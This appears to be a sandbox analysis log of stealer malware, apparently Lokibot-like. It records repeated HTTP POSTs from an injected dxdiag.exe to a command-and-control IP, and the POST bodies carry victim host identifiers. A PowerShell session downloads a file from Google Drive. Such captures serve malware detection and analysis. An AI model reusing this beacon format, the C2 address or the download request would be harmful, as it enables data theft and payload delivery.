                              Oct 1, 2024 07:51:27.042459011 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:51:27.042469978 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.565338137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:27.190448999 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:27.195363998 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:29.856972933 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:27 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:29.856992006 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:29.857002974 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.565339137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:30.004771948 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:30.009648085 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:32.611933947 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:30 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:32.611968994 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:51:32.611979961 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:51:32.611989975 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.565340137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:32.771735907 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:32.776794910 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:35.482767105 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:33 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:35.482790947 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:35.482800961 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.565341137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:35.641314030 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:35.646524906 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:38.277605057 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:36 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:38.277648926 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:38.277684927 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.565342137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:38.422955990 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:38.427886963 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:41.101624966 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:38 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:41.101651907 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:51:41.101661921 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:51:41.101674080 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.549705142.250.186.464437156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-10-01 05:49:36 UTC215OUTGET /uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.google.com
                              Connection: Keep-Alive
                              2024-10-01 05:49:36 UTC1610INHTTP/1.1 303 See Other
                              Content-Type: application/binary
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Tue, 01 Oct 2024 05:49:36 GMT
                              Location: https://drive.usercontent.google.com/download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download
                              Strict-Transport-Security: max-age=31536000
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Cross-Origin-Opener-Policy: same-origin
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
